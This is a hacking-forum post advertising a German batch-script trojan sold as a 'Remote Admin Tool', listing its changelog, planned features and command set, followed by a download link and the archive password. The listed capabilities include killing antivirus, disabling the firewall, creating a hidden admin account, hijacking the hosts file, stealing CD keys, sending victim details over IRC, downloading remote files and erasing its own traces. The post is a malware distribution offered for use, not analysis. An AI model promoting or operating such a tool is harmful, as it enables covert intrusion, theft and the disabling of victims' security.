Форум АНТИЧАТ - [BADtch R.A.T.] V 0.2

Remote Admin Tool (RAT)

http://www.megasecurity.org/trojans/.../Badtch0.2.gif
Код:
  ## About #####################################################################

#                                                                            #

# Name    : [BADtch R.A.T.] 0.2                                              #

# Type    : Remote Admin Tool (RAT)                                          #

# Lizenz  : Freeware                                                         #

# Coder   : Mr Hawk                                                          #

# Company : [BAD R.A.T.]-Company                                             #

# URL     : www.bad-rat.de.vu                                                #

# Blog    : badrat.blog.de                                                   #

# Email   : thebadrat@gmx.de                                                 #

#                                                                            #

##############################################################################



## Achtung: ##################################################################

#                                                                            #

#  Autor kann nicht für eventuelle Schäden zur Verantwortung gezogen werden! #

#  Jeder ist für sein Handeln selbst verwantwortlich!                        #

#                                                                            #

##############################################################################



Alle Script ist Freeware und darf deswegen nicht für komerzielle Zwecke

verwendet werden!

[*] = Bug fixed

[#] = neu hinzugefügt





ToDo (folgendes ist geplant)

Funktionen:

  Icq-Manipulation

  RemoteIP ermitteln-->IP bannen (beim Script)

  Mod und Gast Konto für das Script

  C2C-Chat

  Vic2C-Chat

  Multi-Userfähig

  TCP-Tunnle

  Reserved-Connection

  Filemanger

  Datei suchen

  Rundll32 mciExecute und SendMessageA (Webcam,Mirco,etc)



Zusatz-Scripte:

  Anonym-Mailer

  Polymorphe Verschlüsslung

  IRC-Client

  Port/Hostscanner



Wer mir bei den Funktionen helfen möchte kann sich gerne bei mir melden.





Version 0.2

[*] Dos-CMD von 1 auf 8 Parameter erhöht[*] Fav-Auslesen auch bei Pfaden mit Leerzeichen[*] Prüft, ob der Telnet-Server überhaupt da ist[*] Hosthijack-Dateipfad gefixt[*] Das Menü neu geordnet und in Sektionen unterteilt[*] Großen Call-Syntaxfehler ausgemerzt (V 0.1 funktioniert deswegen nicht)[*] Ü/Ä/Ö durch UE/AE/OE ersetzt (Dos interpretiert diese Buchstaben falsch)[*] Script-Notify verbessert



[#] Login_cmd-Inject

[#] Passwortabfrage für Script

[#] Vic-IP auslesen

[#] SIN IP/Datum/Zeit/OS/Benutzername/Userdomain

[#] IRC-Notify (experimentell)

[#] 3 weiter RegStartups



[#] lasttools                      Listet alle letzten Programme auf

[#] starturl (url)            Oeffnet eine URL

[#] makefav (favname)(favurl) erstellt Favorit

[#] playme (file)             Spielt alles ab (aif,auf,avi,midi,mov,mpeg,sound)

[#] stopme (file)             Stopt Sound

[#] 3dtext ("text")[para_num] 3D-Text-Scr als Standart [1=startet Scr]

[#] marquee("text")[para_num] Marquee-Scr als Standart [1=startet Scr]

[#] wall ("Pfad") [para_num]  Setzt neues Wallpaper [0=zentriert;1=nebeneinander;2=gestreckt]

[#] listuin                   Listet ICQ-UIN auf

[#] readuin                   ICQ-UIN lesen

[#] msgbox "msg"              Nachrichtfenster

[#] beep {delay}              Beep {Delay}





Serversetup



[#] Es gibt erstmal ein Serversetup :o)

[#] Autorun.inf wird erstellt



Plugins



[#] View_Dialogs_Plugin öffnet 47 verschieden Dialog-Fenster[*] Printer_Plugin: HTML-Seite drucken

[#] plugin_cdkeystealer

[#] plugin_dialogs

[#] plugin_kb_code

[#] plugin_syscolor

[#] plugin_roh

[#] plugin_printer



Version 0.1 (untested version)



- Port,USername,Passwort selber wählen

- Startup (Reg und als Service)

- Script-Notify

- Melt Server

- WinXP-FW und Sec-Center ausschalten

- AV-Killer

- AV-Regdisable

- Hosthijack beim Installieren

- Sprache (Deutsch,English)

- Remote-Desktop freigabe

- User Konto mit Adminrechten wird erstellt und versteckt





Befehl                    Beschreibung

ddl "(URL)" "(File)"      Direktdownload

                             "(URL)"  = Quelle im Netz

                             "(File)" = Ziel auf HD

myftp                     Download per FTP

fileprop (Datei)          Dateieigenschaften

inet (num)                Internet

                             1 =Connect

                             2 =Disconnect

userinfo                  User-Informationen

                             1=Allgemein

                             2=Installierte Software

                             3=Mediaplayerlist

                             4=Letzte CMDs

intscr (Scr-Pfad)         Screensaver installieren

intinf (INF) (Section)    Inf-Datei installieren

dklink (Verzeichnis)      Desktop-Verknuepfung

shutdown (num)            Windows

                             1 = Herunterfahren

                             2 = Reboot

                             3 = Abmelden

ieset (num) [hjip hjhost] IE Einstellungen

                             1 = Zeigt Infos

                             2 = Letzten 20 URLs

                             3 = alle Fav auflisten

                             4 = Hosthijack [hjip hjhost]

disreg (num)              Regedit 1=aktivieren;0=deaktivieren

distask (num)             Taskmanager 1=aktivieren;0=deaktivieren

a2g                   Admin wird eingeschraenkt

shutall                       schlieszt alle Programme

dos (command)             Dos-Befehle (CMD)

mouse (num) [para_num]    Maus_Funktionen

                             1 = Ausschalten [1=aktivieren;0=deaktivieren]

                                 2 = Button austauschen

                                 3 = setzt Curser nach Links oben

                             4 = DoubleClickSpeed [para_num] (z.B. 500)

                             5 = MouseSensitivity [para_num] (z.B. 10)

                             6 = MouseSpeed [para_num] (z.B. 1)

                                 7 = Button austauschen (bei Neustart)

diskey (num)              Tastatur 1=aktiviert;0=deaktiviert

plug (plugin)             startet Plugin-Script

selfkill (y)              Loescht sich selber und verwischt alle Spuren,
Homepage:

http://omega2.om.funpic.de/batch/

Download:
Код:
http://omega2.om.funpic.de/batch/public02.zip
Цитата:
Passwort = mrhawk